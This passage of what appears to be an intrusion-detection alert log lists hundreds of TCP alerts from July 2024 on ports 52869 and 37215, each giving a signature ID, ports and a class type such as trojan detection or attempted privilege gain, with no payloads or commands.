                      Source Port:48348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.773260
                      SID:2025132
                      Source Port:38564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.226478
                      SID:2025132
                      Source Port:51024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.182071
                      SID:2027339
                      Source Port:35410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2835222
                      Source Port:48150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.720788
                      SID:2025132
                      Source Port:50706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.855159
                      SID:2025132
                      Source Port:34610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.321189
                      SID:2831300
                      Source Port:58236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.260372
                      SID:2027339
                      Source Port:49634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.704266
                      SID:2025132
                      Source Port:49340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.604394
                      SID:2027339
                      Source Port:56780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2831300
                      Source Port:52958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.389834
                      SID:2027339
                      Source Port:56604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.475794
                      SID:2027339
                      Source Port:48188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:47996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.923449
                      SID:2027339
                      Source Port:38996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.320867
                      SID:2027339
                      Source Port:60014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.263272
                      SID:2831300
                      Source Port:39888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.572197
                      SID:2027339
                      Source Port:55296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.496780
                      SID:2027339
                      Source Port:53180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.721182
                      SID:2027339
                      Source Port:60912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.037292
                      SID:2025132
                      Source Port:56686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.304504
                      SID:2027339
                      Source Port:43656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2829579
                      Source Port:41724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2835222
                      Source Port:50048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220954
                      SID:2829579
                      Source Port:34064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.759828
                      SID:2027339
                      Source Port:35976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.446628
                      SID:2027339
                      Source Port:48604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.110241
                      SID:2025132
                      Source Port:35770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2835222
                      Source Port:48300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.141900
                      SID:2027339
                      Source Port:38882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2829579
                      Source Port:57408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312895
                      SID:2027339
                      Source Port:42770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.525770
                      SID:2025132
                      Source Port:36520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.338159
                      SID:2831300
                      Source Port:42886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2829579
                      Source Port:49124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.158279
                      SID:2835222
                      Source Port:37060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.293475
                      SID:2831300
                      Source Port:45978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.996055
                      SID:2835222
                      Source Port:41248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.547161
                      SID:2027339
                      Source Port:36362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2027339
                      Source Port:50034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.093693
                      SID:2027339
                      Source Port:38192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.203011
                      SID:2829579
                      Source Port:52244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2835222
                      Source Port:37496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.412594
                      SID:2027339
                      Source Port:47728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.374045
                      SID:2025132
                      Source Port:54602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.192248
                      SID:2027339
                      Source Port:60782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.197215
                      SID:2025132
                      Source Port:52494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2835222
                      Source Port:45854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.578116
                      SID:2831300
                      Source Port:33938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.921789
                      SID:2831300
                      Source Port:53216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.516827
                      SID:2025132
                      Source Port:57370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2829579
                      Source Port:54670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.809584
                      SID:2831300
                      Source Port:48800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2829579
                      Source Port:38714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.522869
                      SID:2027339
                      Source Port:39106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.828422
                      SID:2829579
                      Source Port:38350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.357440
                      SID:2027339
                      Source Port:53138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.020186
                      SID:2025132
                      Source Port:58968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.159165
                      SID:2027339
                      Source Port:43160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:53158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.060344
                      SID:2835222
                      Source Port:50014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.619336
                      SID:2025132
                      Source Port:34018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.536863
                      SID:2831300
                      Source Port:49478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.242138
                      SID:2027339
                      Source Port:47118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.861753
                      SID:2027339
                      Source Port:43498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.618795
                      SID:2027339
                      Source Port:38894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.261796
                      SID:2025132
                      Source Port:47412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.908066
                      SID:2025132
                      Source Port:46248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.171350
                      SID:2027339
                      Source Port:44834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.020551
                      SID:2025132
                      Source Port:45532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.514415
                      SID:2027339
                      Source Port:40638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.814790
                      SID:2025132
                      Source Port:55022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.798104
                      SID:2025132
                      Source Port:44152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.105161
                      SID:2025132
                      Source Port:40332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.106165
                      SID:2027339
                      Source Port:45766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222090
                      SID:2829579
                      Source Port:41354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.109665
                      SID:2027339
                      Source Port:40882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.519318
                      SID:2831300
                      Source Port:51790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2829579
                      Source Port:50504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.877606
                      SID:2025132
                      Source Port:34746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:39608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952783
                      SID:2829579
                      Source Port:36672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2829579
                      Source Port:53248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.990801
                      SID:2027339
                      Source Port:43992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.611556
                      SID:2025132
                      Source Port:53552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.376572
                      SID:2831300
                      Source Port:51538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:57980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.903732
                      SID:2831300
                      Source Port:34390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.321371
                      SID:2027339
                      Source Port:49116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.593868
                      SID:2027339
                      Source Port:42564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.347676
                      SID:2025132
                      Source Port:52512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.498157
                      SID:2027339
                      Source Port:56966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.201033
                      SID:2835222
                      Source Port:43482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.931985
                      SID:2835222
                      Source Port:60650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.902509
                      SID:2831300
                      Source Port:50868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.978142
                      SID:2829579
                      Source Port:60578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.827400
                      SID:2027339
                      Source Port:41062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.371551
                      SID:2027339
                      Source Port:43256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2027339
                      Source Port:60212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.565131
                      SID:2831300
                      Source Port:54952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.340201
                      SID:2027339
                      Source Port:56924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.370228
                      SID:2025132
                      Source Port:58642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.108910
                      SID:2027339
                      Source Port:36110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.328792
                      SID:2027339
                      Source Port:50676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.167781
                      SID:2027339
                      Source Port:33470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2829579
                      Source Port:51098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:51412
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:49142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.805765
                      SID:2027339
                      Source Port:35282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2835222
                      Source Port:56136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.357099
                      SID:2027339
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221145
                      SID:2835222
                      Source Port:44014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.290014
                      SID:2831300
                      Source Port:41124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.083203
                      SID:2027339
                      Source Port:51036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2835222
                      Source Port:38596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2829579
                      Source Port:51062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.769238
                      SID:2027339
                      Source Port:37584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:36186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.046652
                      SID:2829579
                      Source Port:42354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.005310
                      SID:2025132
                      Source Port:50682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.363756
                      SID:2025132
                      Source Port:45268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.668073
                      SID:2835222
                      Source Port:60144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2027339
                      Source Port:44950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2835222
                      Source Port:41958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.630356
                      SID:2025132
                      Source Port:56840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2835222
                      Source Port:36856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883171
                      SID:2835222
                      Source Port:60342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.035612
                      SID:2027339
                      Source Port:59540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.474539
                      SID:2027339
                      Source Port:49394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2829579
                      Source Port:48232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.280564
                      SID:2025132
                      Source Port:41996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.203681
                      SID:2027339
                      Source Port:39616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.185498
                      SID:2831300
                      Source Port:59604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:37.123706
                      SID:2027339
                      Source Port:36914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.504282
                      SID:2027339
                      Source Port:43928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.785967
                      SID:2027339
                      Source Port:37182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:33448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633633
                      SID:2835222
                      Source Port:37138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.763630
                      SID:2025132
                      Source Port:36860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.494330
                      SID:2027339
                      Source Port:60812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.020186
                      SID:2027339
                      Source Port:48454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.011895
                      SID:2831300
                      Source Port:52832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.670958
                      SID:2025132
                      Source Port:42826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.384516
                      SID:2027339
                      Source Port:54890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.982233
                      SID:2027339
                      Source Port:33924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.355589
                      SID:2829579
                      Source Port:39320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.772213
                      SID:2027339
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.787786
                      SID:2025132
                      Source Port:41992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:45724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.164529
                      SID:2831300
                      Source Port:35910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2835222
                      Source Port:52812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2829579
                      Source Port:38704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590937
                      SID:2831300
                      Source Port:34124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2831300
                      Source Port:38256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:54302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:49424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.161942
                      SID:2025132
                      Source Port:47250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.455724
                      SID:2025132
                      Source Port:41808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.092258
                      SID:2027339
                      Source Port:55428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.517854
                      SID:2027339
                      Source Port:58038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2829579
                      Source Port:57714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:34552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:35972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.370481
                      SID:2027339
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.489563
                      SID:2025132
                      Source Port:43520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.126869
                      SID:2835222
                      Source Port:40750
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:59300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.447066
                      SID:2025132
                      Source Port:55858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2835222
                      Source Port:50410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.999060
                      SID:2025132
                      Source Port:46928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.663212
                      SID:2025132
                      Source Port:48812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.022868
                      SID:2025132
                      Source Port:34466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.644828
                      SID:2025132
                      Source Port:55828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.596807
                      SID:2025132
                      Source Port:36092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.690792
                      SID:2025132
                      Source Port:48132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.384793
                      SID:2027339
                      Source Port:46206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.605795
                      SID:2027339
                      Source Port:35024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.892361
                      SID:2027339
                      Source Port:57358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596563
                      SID:2027339
                      Source Port:52728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.153862
                      SID:2831300
                      Source Port:55358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
